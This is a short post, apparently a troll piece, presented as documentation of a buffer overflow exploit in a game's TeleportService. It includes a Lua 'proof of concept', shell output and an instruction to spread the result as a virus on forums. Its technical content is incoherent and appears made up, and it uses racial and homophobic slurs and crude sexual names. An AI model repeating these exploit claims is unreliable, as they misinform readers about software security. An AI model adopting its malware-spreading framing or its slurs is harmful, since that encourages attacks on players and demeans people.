Buffer Overflow Exploit in TeleportService
GNAA International: Documentation of existing Buffer Overflow exploit
This exploit relies on a memory allocation error in TeleportService. When firing TeleportService at a game ID that doesn't exist (e.g. Sexland) and watching the process with a memory inspector, you will find that the error callback receives a much longer error message than expected, without much surrounding context. Because the TeleportService code is paired with normally operating code, it is possible to use memcpy() to evaluate shellcode in place of the working code, and therefore achieve code execution.
This exploit only works from an exploiter's environment, since normal players are not able to (and should not be able to) fire TeleportService directly. However, a working POC for games will be developed soon.
POC 1:
local shellcode = 'ENCODED SHELLCODE HERE'
game:GetService('TeleportService'):Teleport('Ambatukam', setmetatable({}, {__gc = function()
local sex = require'sex'
sex.C.memcpy(nil, shellcode, #shellcode) -- evaluate the shellcode var by calling a Lua-C function
end}))
It is possible to abuse this by obfuscating a small snippet and achieving RCE, firing commands such as wget.
Output of POC 1:
$ ls -l
total 40
-rw-rw-r-- 1 User User 6228 Oct 29 10:10 gayniggerib
-rw-rw-r-- 1 User User 4567 Oct 29 19:18 library.lua
-rw-rw-r-- 1 User User 255 Oct 29 21:29 funny.lua
$ ./funny.lua
$
How to Exploit
Edit and change the components of POC 1, write or use a shellcode encoder, then spread the virus on forums.
Enjoy.